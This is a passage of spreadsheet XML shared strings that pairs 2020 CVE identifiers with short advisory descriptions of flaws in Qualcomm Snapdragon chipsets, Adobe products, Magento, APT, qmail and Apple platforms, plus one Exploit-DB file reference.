    <t>Local privilege escalation in admin services in Windows environment can occur due to an arbitrary read issue.</t>
  </si>
  <si>
    <t>CVE-2020-3688</t>
  </si>
  <si>
    <t>Possible buffer overflow while parsing mp4 clip with corrupted sample atoms due to improper validation of index in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8998, Nicobar, QCA6574AU, QCM2150, QCS405, QCS605, QM215, Rennell, SA6155P, Saipan, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3690</t>
  </si>
  <si>
    <t>u'Due to an incorrect SMMU configuration, the modem crypto engine can potentially compromise the hypervisor' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in Agatti, Bitra, Kamorta, Nicobar, QCA6390, QCS404, QCS605, QCS610, Rennell, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC7180, SC8180X, SDA845, SDM670, SDM710, SDM845, SDM850, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3691</t>
  </si>
  <si>
    <t>Possible out of bound memory access in audio due to integer underflow while processing modified contents in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-3692</t>
  </si>
  <si>
    <t>u'Possible buffer overflow while updating output buffer for IMEI and Gateway Address due to lack of check of input validation for parameters received from server' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in Agatti, Kamorta, Nicobar, QCM6125, QCS610, Rennell, SA415M, Saipan, SC7180, SC8180X, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3693</t>
  </si>
  <si>
    <t>u'Use out of range pointer issue can occur due to incorrect buffer range check during the execution of qseecom.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8098, Bitra, MSM8909W, MSM8996AU, Nicobar, QCM2150, QCS605, Saipan, SDM429W, SDX20, SM6150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3694</t>
  </si>
  <si>
    <t>u'Use out of range pointer issue can occur due to incorrect buffer range check during the execution of qseecom' in Snapdragon Auto, Snapdragon Compute, Snapdragon Mobile, Snapdragon Voice &amp; Music in Bitra, Nicobar, Saipan, SM6150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3696</t>
  </si>
  <si>
    <t>u'Use after free while installing new security rule in ipcrtr as old one is deleted and this rule could still be in use for checking security permission for particular process' in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, IPQ4019, IPQ6018, IPQ8064, IPQ8074, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8996AU, QCA4531, QCA6574AU, QCA9531, QCM2150, QCS605, SDM429W, SDX20, SDX24</t>
  </si>
  <si>
    <t>CVE-2020-3698</t>
  </si>
  <si>
    <t>Out of bound write while QoS DSCP mapping due to improper input validation for data received from association response frame in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, Nicobar, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCM2150, QCN7605, QCS405, QCS605, QM215, SA6155P, Saipan, SC8180X, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX55, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3699</t>
  </si>
  <si>
    <t>Possible out of bound access while processing assoc response from host due to improper length check before copying into buffer in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, Nicobar, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCM2150, QCN7605, QCS405, QCS605, QM215, SA6155P, Saipan, SC8180X, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3700</t>
  </si>
  <si>
    <t>Possible out of bounds read due to a missing bounds check and could lead to local information disclosure in the wifi driver with no additional execution privileges needed in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8053, APQ8096AU, IPQ4019, IPQ8064, IPQ8074, MDM9607, MSM8909W, MSM8996AU, QCA6574AU, QCA9531, QCA9558, QCA9980, SC8180X, SDM439, SDX55, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3701</t>
  </si>
  <si>
    <t>Use after free issue while processing error notification from camx driver due to not properly releasing the sequence data in Snapdragon Mobile in Saipan, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3702</t>
  </si>
  <si>
    <t>u'Specifically timed and handcrafted traffic can cause internal errors in a WLAN device that lead to improper layer 2 Wi-Fi encryption with a consequent possibility of information disclosure over the air for a discrete set of traffic' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8053, IPQ4019, IPQ8064, MSM8909W, MSM8996AU, QCA9531, QCN5502, QCS405, SDX20, SM6150, SM7150</t>
  </si>
  <si>
    <t>CVE-2020-3703</t>
  </si>
  <si>
    <t>u'Buffer over-read issue in Bluetooth peripheral firmware due to lack of check for invalid opcode and length of opcode received from central device(This CVE is equivalent to Link Layer Length Overfow issue (CVE-2019-16336,CVE-2019-17519) and Silent Length Overflow issue(CVE-2019-17518) mentioned in sweyntooth paper)' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music in APQ8053, APQ8076, AR9344, Bitra, Kamorta, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8917, MSM8937, MSM8940, MSM8953, Nicobar, QCA6174A, QCA9377, QCM2150, QCM6125, QCS404, QCS405, QCS605, QCS610, QM215, Rennell, SC8180X, SDM429, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SDX24, SM6150, SM7150, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3704</t>
  </si>
  <si>
    <t>u'While processing invalid connection request PDU which is nonstandard (interval or timeout is 0) from central device may lead peripheral system enter into dead lock state.(This CVE is equivalent to InvalidConnectionRequest(CVE-2019-19193) mentioned in sweyntooth paper)' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, APQ8017, APQ8053, AR9344, Bitra, IPQ5018, Kamorta, MDM9607, MDM9640, MDM9650, MSM8996AU, Nicobar, QCA6174A, QCA6390, QCA6574AU, QCA9377, QCA9886, QCM6125, QCN7605, QCS404, QCS405, QCS605, QCS610, QRB5165, Rennell, SA415M, SA515M, Saipan, SC7180, SC8180X, SDA845, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3710</t>
  </si>
  <si>
    <t>Adobe Illustrator CC versions 24.0 and earlier have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3711</t>
  </si>
  <si>
    <t>CVE-2020-3712</t>
  </si>
  <si>
    <t>CVE-2020-3713</t>
  </si>
  <si>
    <t>CVE-2020-3714</t>
  </si>
  <si>
    <t>CVE-2020-3715</t>
  </si>
  <si>
    <t>Magento versions 2.3.3 and earlier, 2.2.10 and earlier, 1.14.4.3 and earlier, and 1.9.4.3 and earlier have a stored cross-site scripting vulnerability. Successful exploitation could lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3716</t>
  </si>
  <si>
    <t>Magento versions 2.3.3 and earlier, 2.2.10 and earlier, 1.14.4.3 and earlier, and 1.9.4.3 and earlier have a deserialization of untrusted data vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3717</t>
  </si>
  <si>
    <t>Magento versions 2.3.3 and earlier, 2.2.10 and earlier, 1.14.4.3 and earlier, and 1.9.4.3 and earlier have a path traversal vulnerability. Successful exploitation could lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3718</t>
  </si>
  <si>
    <t>Magento versions 2.3.3 and earlier, 2.2.10 and earlier, 1.14.4.3 and earlier, and 1.9.4.3 and earlier have a security bypass vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3719</t>
  </si>
  <si>
    <t>Magento versions 2.3.3 and earlier, 2.2.10 and earlier, 1.14.4.3 and earlier, and 1.9.4.3 and earlier have an sql injection vulnerability. Successful exploitation could lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3720</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019.0.4 and below have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3721</t>
  </si>
  <si>
    <t>CVE-2020-3722</t>
  </si>
  <si>
    <t>CVE-2020-3723</t>
  </si>
  <si>
    <t>CVE-2020-3724</t>
  </si>
  <si>
    <t>CVE-2020-3725</t>
  </si>
  <si>
    <t>CVE-2020-3726</t>
  </si>
  <si>
    <t>CVE-2020-3727</t>
  </si>
  <si>
    <t>CVE-2020-3728</t>
  </si>
  <si>
    <t>CVE-2020-3729</t>
  </si>
  <si>
    <t>CVE-2020-3730</t>
  </si>
  <si>
    <t>CVE-2020-3731</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019.0.4 and below have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3732</t>
  </si>
  <si>
    <t>CVE-2020-3733</t>
  </si>
  <si>
    <t>CVE-2020-3734</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019.0.4 and below have a buffer error vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3735</t>
  </si>
  <si>
    <t>CVE-2020-3736</t>
  </si>
  <si>
    <t>CVE-2020-3737</t>
  </si>
  <si>
    <t>CVE-2020-3738</t>
  </si>
  <si>
    <t>CVE-2020-3739</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019.0.4 and below have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3740</t>
  </si>
  <si>
    <t>CVE-2020-3741</t>
  </si>
  <si>
    <t>Adobe Experience Manager versions 6.5, and 6.4 have an uncontrolled resource consumption vulnerability. Successful exploitation could lead to denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2020-3742</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions, 2019.021.20061 and earlier, 2017.011.30156 and earlier, 2017.011.30156 and earlier, and 2015.006.30508 and earlier have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3743</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2019.021.20061 and earlier, 2017.011.30156 and earlier, 2017.011.30156 and earlier, and 2015.006.30508 and earlier have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3744</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2019.021.20061 and earlier, 2017.011.30156 and earlier, 2017.011.30156 and earlier, and 2015.006.30508 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure .</t>
  </si>
  <si>
    <t>CVE-2020-3745</t>
  </si>
  <si>
    <t>CVE-2020-3746</t>
  </si>
  <si>
    <t>CVE-2020-3747</t>
  </si>
  <si>
    <t>CVE-2020-3748</t>
  </si>
  <si>
    <t>CVE-2020-3749</t>
  </si>
  <si>
    <t>CVE-2020-3750</t>
  </si>
  <si>
    <t>CVE-2020-3751</t>
  </si>
  <si>
    <t>CVE-2020-3752</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2019.021.20061 and earlier, 2017.011.30156 and earlier, 2017.011.30156 and earlier, and 2015.006.30508 and earlier have a buffer error vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3753</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2019.021.20061 and earlier, 2017.011.30156 and earlier, 2017.011.30156 and earlier, and 2015.006.30508 and earlier have a stack exhaustion vulnerability. Successful exploitation could lead to memory leak .</t>
  </si>
  <si>
    <t>CVE-2020-3754</t>
  </si>
  <si>
    <t>CVE-2020-3755</t>
  </si>
  <si>
    <t>CVE-2020-3756</t>
  </si>
  <si>
    <t>CVE-2020-3757</t>
  </si>
  <si>
    <t>Adobe Flash Player versions 32.0.0.321 and earlier, 32.0.0.314 and earlier, 32.0.0.321 and earlier, and 32.0.0.255 and earlier have a type confusion vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3758</t>
  </si>
  <si>
    <t>CVE-2020-3759</t>
  </si>
  <si>
    <t>Adobe Digital Editions versions 4.5.10 and below have a buffer errors vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3760</t>
  </si>
  <si>
    <t>Adobe Digital Editions versions 4.5.10 and below have a command injection vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3761</t>
  </si>
  <si>
    <t>ColdFusion versions ColdFusion 2016, and ColdFusion 2018 have a remote file read vulnerability. Successful exploitation could lead to arbitrary file read from the coldfusion install directory.</t>
  </si>
  <si>
    <t>CVE-2020-3762</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2019.021.20061 and earlier, 2017.011.30156 and earlier, 2017.011.30156 and earlier, and 2015.006.30508 and earlier have a privilege escalation vulnerability. Successful exploitation could lead to arbitrary file system write.</t>
  </si>
  <si>
    <t>CVE-2020-3763</t>
  </si>
  <si>
    <t>CVE-2020-3764</t>
  </si>
  <si>
    <t>Adobe Media Encoder versions 14.0 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3765</t>
  </si>
  <si>
    <t>Adobe After Effects versions 16.1.2 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3766</t>
  </si>
  <si>
    <t>Adobe Genuine Integrity Service versions Version 6.4 and earlier have an insecure file permissions vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-3767</t>
  </si>
  <si>
    <t>ColdFusion versions ColdFusion 2016, and ColdFusion 2018 have an insufficient input validation vulnerability. Successful exploitation could lead to application-level denial-of-service (dos).</t>
  </si>
  <si>
    <t>CVE-2020-3768</t>
  </si>
  <si>
    <t>ColdFusion versions ColdFusion 2016, and ColdFusion 2018 have a dll search-order hijacking vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-3769</t>
  </si>
  <si>
    <t>Adobe Experience Manager versions 6.5 and earlier have a server-side request forgery (ssrf) vulnerability. Successful exploitation could lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3770</t>
  </si>
  <si>
    <t>Adobe Photoshop CC 2019 versions 20.0.8 and earlier, and Photoshop 2020 versions 21.1 and earlier have a buffer errors vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3771</t>
  </si>
  <si>
    <t>Adobe Photoshop CC 2019 versions 20.0.8 and earlier, and Photoshop 2020 versions 21.1 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3772</t>
  </si>
  <si>
    <t>CVE-2020-3773</t>
  </si>
  <si>
    <t>Adobe Photoshop CC 2019 versions 20.0.8 and earlier, and Photoshop 2020 versions 21.1 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3774</t>
  </si>
  <si>
    <t>CVE-2020-3775</t>
  </si>
  <si>
    <t>CVE-2020-3776</t>
  </si>
  <si>
    <t>CVE-2020-3777</t>
  </si>
  <si>
    <t>CVE-2020-3778</t>
  </si>
  <si>
    <t>Adobe Photoshop versions Photoshop CC 2019, and Photoshop 2020 have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3779</t>
  </si>
  <si>
    <t>CVE-2020-3780</t>
  </si>
  <si>
    <t>CVE-2020-3781</t>
  </si>
  <si>
    <t>CVE-2020-3782</t>
  </si>
  <si>
    <t>CVE-2020-3783</t>
  </si>
  <si>
    <t>Adobe Photoshop CC 2019 versions 20.0.8 and earlier, and Photoshop 2020 versions 21.1 and earlier have a heap corruption vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3784</t>
  </si>
  <si>
    <t>Adobe Photoshop CC 2019 versions 20.0.8 and earlier, and Photoshop 2020 versions 21.1 and earlier have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3785</t>
  </si>
  <si>
    <t>CVE-2020-3786</t>
  </si>
  <si>
    <t>CVE-2020-3787</t>
  </si>
  <si>
    <t>CVE-2020-3788</t>
  </si>
  <si>
    <t>CVE-2020-3789</t>
  </si>
  <si>
    <t>CVE-2020-3790</t>
  </si>
  <si>
    <t>CVE-2020-3791</t>
  </si>
  <si>
    <t>CVE-2020-3792</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20034 and earlier, 2017.011.30158 and earlier, 2017.011.30158 and earlier, 2015.006.30510 and earlier, and 2015.006.30510 and earlier have a use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3793</t>
  </si>
  <si>
    <t>CVE-2020-3794</t>
  </si>
  <si>
    <t>ColdFusion versions ColdFusion 2016, and ColdFusion 2018 have a file inclusion vulnerability. Successful exploitation could lead to arbitrary code execution of files located in the webroot or its subdirectory.</t>
  </si>
  <si>
    <t>CVE-2020-3795</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20034 and earlier, 2017.011.30158 and earlier, 2017.011.30158 and earlier, 2015.006.30510 and earlier, and 2015.006.30510 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3796</t>
  </si>
  <si>
    <t>ColdFusion versions ColdFusion 2016, and ColdFusion 2018 have an improper access control vulnerability. Successful exploitation could lead to system file structure disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3797</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20034 and earlier, 2017.011.30158 and earlier, 2017.011.30158 and earlier, 2015.006.30510 and earlier, and 2015.006.30510 and earlier have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3798</t>
  </si>
  <si>
    <t>Adobe Digital Editions versions 4.5.11.187212 and below have a file enumeration (host or local network) vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-3799</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20034 and earlier, 2017.011.30158 and earlier, 2017.011.30158 and earlier, 2015.006.30510 and earlier, and 2015.006.30510 and earlier have a stack-based buffer overflow vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3800</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20034 and earlier, 2017.011.30158 and earlier, 2017.011.30158 and earlier, 2015.006.30510 and earlier, and 2015.006.30510 and earlier have a memory address leak vulnerability. Successful exploitation could lead to information disclosure .</t>
  </si>
  <si>
    <t>CVE-2020-3801</t>
  </si>
  <si>
    <t>CVE-2020-3802</t>
  </si>
  <si>
    <t>CVE-2020-3803</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20034 and earlier, 2017.011.30158 and earlier, 2017.011.30158 and earlier, 2015.006.30510 and earlier, and 2015.006.30510 and earlier have an insecure library loading (dll hijacking) vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-3804</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20034 and earlier, 2017.011.30158 and earlier, 2017.011.30158 and earlier, 2015.006.30510 and earlier, and 2015.006.30510 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure .</t>
  </si>
  <si>
    <t>CVE-2020-3805</t>
  </si>
  <si>
    <t>CVE-2020-3806</t>
  </si>
  <si>
    <t>CVE-2020-3807</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20034 and earlier, 2017.011.30158 and earlier, 2017.011.30158 and earlier, 2015.006.30510 and earlier, and 2015.006.30510 and earlier have a buffer overflow vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-3808</t>
  </si>
  <si>
    <t>Creative Cloud Desktop Application versions 5.0 and earlier have a time-of-check to time-of-use (toctou) race condition vulnerability. Successful exploitation could lead to arbitrary file deletion.</t>
  </si>
  <si>
    <t>CVE-2020-3809</t>
  </si>
  <si>
    <t>Adobe After Effects versions 17.0.1 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure .</t>
  </si>
  <si>
    <t>CVE-2020-3810</t>
  </si>
  <si>
    <t>Missing input validation in the ar/tar implementations of APT before version 2.1.2 could result in denial of service when processing specially crafted deb files.</t>
  </si>
  <si>
    <t>CVE-2020-3811</t>
  </si>
  <si>
    <t>qmail-verify as used in netqmail 1.06 is prone to a mail-address verification bypass vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3812</t>
  </si>
  <si>
    <t>qmail-verify as used in netqmail 1.06 is prone to an information disclosure vulnerability. A local attacker can test for the existence of files and directories anywhere in the filesystem because qmail-verify runs as root and tests for the existence of files in the attacker's home directory, without dropping its privileges first.</t>
  </si>
  <si>
    <t>CVE-2020-3825</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3826</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3827</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.3. Viewing a maliciously crafted JPEG file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3828</t>
  </si>
  <si>
    <t>A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1. A person with physical access to an iOS device may be able to access contacts from the lock screen.</t>
  </si>
  <si>
    <t>CVE-2020-3829</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. An application may be able to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3830</t>
  </si>
  <si>
    <t>A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Catalina 10.15.3. A malicious application may be able to overwrite arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-3831</t>
  </si>
  <si>
    <t>A race condition was addressed with improved locking. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3833</t>
  </si>
  <si>
    <t>An inconsistent user interface issue was addressed with improved state management. This issue is fixed in Safari 13.0.5. Visiting a malicious website may lead to address bar spoofing.</t>
  </si>
  <si>
    <t>CVE-2020-3834</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 6.1.2. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3835</t>
  </si>
  <si>
    <t>A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Catalina 10.15.3. A malicious application may be able to access restricted files.</t>
  </si>
  <si>
    <t>CVE-2020-3836</t>
  </si>
  <si>
    <t>An access issue was addressed with improved memory management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. A malicious application may be able to determine kernel memory layout.</t>
  </si>
  <si>
    <t>CVE-2020-3837</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>exploits/multiple/dos/48035.txt</t>
  </si>
  <si>
    <t>iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()</t>
  </si>
  <si>
    <t>CVE-2020-3838</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. An application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3839</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Catalina 10.15.3. An application may be able to read restricted memory.</t>
  </si>
  <si>
    <t>CVE-2020-3840</t>
  </si>
  <si>
    <t>An off by one issue existed in the handling of racoon configuration files. This issue was addressed through improved bounds checking. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1. Loading a maliciously crafted racoon configuration file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3841</t>
  </si>
  <si>
    <t>The issue was addressed with improved UI handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, Safari 13.0.5. A local user may unknowingly send a password unencrypted over the network.</t>
  </si>
  <si>
    <t>CVE-2020-3842</t>
  </si>
  <si>
    <t>CVE-2020-3843</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 12.4.7, watchOS 5.3.7. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-3844</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1. Users removed from an iMessage conversation may still be able to alter state.</t>
  </si>
  <si>
    <t>CVE-2020-3845</t>
  </si>
  <si>
